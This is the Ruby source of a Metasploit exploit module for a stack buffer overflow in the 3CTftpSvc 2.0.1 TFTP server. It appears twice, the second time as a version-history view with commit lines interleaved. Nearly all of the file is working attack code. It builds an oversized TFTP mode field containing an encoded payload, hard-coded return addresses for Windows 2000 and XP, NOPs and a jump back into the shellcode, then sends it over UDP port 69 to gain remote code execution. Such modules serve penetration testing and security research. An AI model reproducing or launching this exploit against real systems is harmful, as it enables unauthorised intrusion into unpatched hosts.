metasploit-framework/modules/exploits/windows/tftp/threectftpsvc_long_mode.rb

require 'msf/core'

module Msf

class Exploits::Windows::Tftp::Threectftpsvc_Long_Mode < Msf::Exploit::Remote

	include Exploit::Remote::Udp

	def initialize(info = {})
		super(update_info(info,
			'Name'           => '3CTftpSvc TFTP Long Mode Buffer Overflow',
			'Description'    => %q{
				This module exploits a stack overflow in 3CTftpSvc 2.0.1. By 
				sending a specially crafted packet with an overly long mode
				field, a remote attacker could overflow a buffer and execute
				arbitrary code on the system.
			},
			'Author'         => 'MC',
			'Version'        => '$Revision: 3653 $',
			'References'     => 
				[ 
					['BID', '21301'],
					['URL', 'http://secunia.com/advisories/23113/'],
				],
			'DefaultOptions' =>
				{
					'EXITFUNC' => 'thread',
				},
			'Payload'        =>
				{
					'Space'    => 400,
					'BadChars' => "\x00\x0a\x0d\x20\x22\x25\x26\x27\x2b\x2f\x3a\x3c\x3e\x3f\x40",
					'StackAdjustment' => -3500,
				},
			'Platform'       => 'win',
			'Targets'        =>
				[
					[ 'Windows 2000 Pro SP4 English',		{ 'Ret' => 0x77e14c29 } ], 
					[ 'Windows XP Pro SP2 English',			{ 'Ret' => 0x77dc15c0 } ],
				],
			'Privileged'     => true,
			'DisclosureDate' => 'Nov 27 2006'))

			register_options([Opt::RPORT(69)], self)

	end

	def exploit
		connect_udp

		sploit = "\x00\x02" + Rex::Text.rand_text_alpha_upper(1) + "\x00"
		sploit << Rex::Text.rand_text_alpha_upper(73) + payload.encoded  
		sploit << [target.ret].pack('V') + make_nops(20) + [0xe8, -325].pack('CV') + "\x00"  

		print_status("Trying target #{target.name}...")
			
		udp_sock.put(sploit)
		
		disconnect_udp		
	end

end
end
added exploit module threectftpsvc_long_mode.rb git-svn-id: file:///home/svn/framework3/trunk@4153 4d416f70-5f16-0410-b530-b9f4589650da 2006-11-28 14:41:35 +00:00			`require 'msf/core'`

			`module Msf`

			`class Exploits::Windows::Tftp::Threectftpsvc_Long_Mode < Msf::Exploit::Remote`

			`include Exploit::Remote::Udp`

			`def initialize(info = {})`
			`super(update_info(info,`
			`'Name' => '3CTftpSvc TFTP Long Mode Buffer Overflow',`
			`'Description' => %q{`
			`This module exploits a stack overflow in 3CTftpSvc 2.0.1. By`
			`sending a specially crafted packet with an overly long mode`
			`field, a remote attacker could overflow a buffer and execute`
			`arbitrary code on the system.`
			`},`
			`'Author' => 'MC',`
			`'Version' => '$Revision: 3653 $',`
			`'References' =>`
			`[`
added bid id, and cleaned up exploit buffer for threectftpsvc_long_mode.rb. git-svn-id: file:///home/svn/framework3/trunk@4155 4d416f70-5f16-0410-b530-b9f4589650da 2006-11-29 13:46:14 +00:00			`['BID', '21301'],`
added exploit module threectftpsvc_long_mode.rb git-svn-id: file:///home/svn/framework3/trunk@4153 4d416f70-5f16-0410-b530-b9f4589650da 2006-11-28 14:41:35 +00:00			`['URL', 'http://secunia.com/advisories/23113/'],`
			`],`
			`'DefaultOptions' =>`
			`{`
			`'EXITFUNC' => 'thread',`
			`},`
			`'Payload' =>`
			`{`
			`'Space' => 400,`
			`'BadChars' => "\x00\x0a\x0d\x20\x22\x25\x26\x27\x2b\x2f\x3a\x3c\x3e\x3f\x40",`
			`'StackAdjustment' => -3500,`
			`},`
			`'Platform' => 'win',`
			`'Targets' =>`
			`[`
			`[ 'Windows 2000 Pro SP4 English', { 'Ret' => 0x77e14c29 } ],`
			`[ 'Windows XP Pro SP2 English', { 'Ret' => 0x77dc15c0 } ],`
			`],`
			`'Privileged' => true,`
added bid id, and cleaned up exploit buffer for threectftpsvc_long_mode.rb. git-svn-id: file:///home/svn/framework3/trunk@4155 4d416f70-5f16-0410-b530-b9f4589650da 2006-11-29 13:46:14 +00:00			`'DisclosureDate' => 'Nov 27 2006'))`
added exploit module threectftpsvc_long_mode.rb git-svn-id: file:///home/svn/framework3/trunk@4153 4d416f70-5f16-0410-b530-b9f4589650da 2006-11-28 14:41:35 +00:00
			`register_options([Opt::RPORT(69)], self)`

			`end`

			`def exploit`
			`connect_udp`

added bid id, and cleaned up exploit buffer for threectftpsvc_long_mode.rb. git-svn-id: file:///home/svn/framework3/trunk@4155 4d416f70-5f16-0410-b530-b9f4589650da 2006-11-29 13:46:14 +00:00			`sploit = "\x00\x02" + Rex::Text.rand_text_alpha_upper(1) + "\x00"`
			`sploit << Rex::Text.rand_text_alpha_upper(73) + payload.encoded`
added exploit module threectftpsvc_long_mode.rb git-svn-id: file:///home/svn/framework3/trunk@4153 4d416f70-5f16-0410-b530-b9f4589650da 2006-11-28 14:41:35 +00:00			`sploit << [target.ret].pack('V') + make_nops(20) + [0xe8, -325].pack('CV') + "\x00"`

			`print_status("Trying target #{target.name}...")`

			`udp_sock.put(sploit)`

			`disconnect_udp`
			`end`

			`end`
			`end`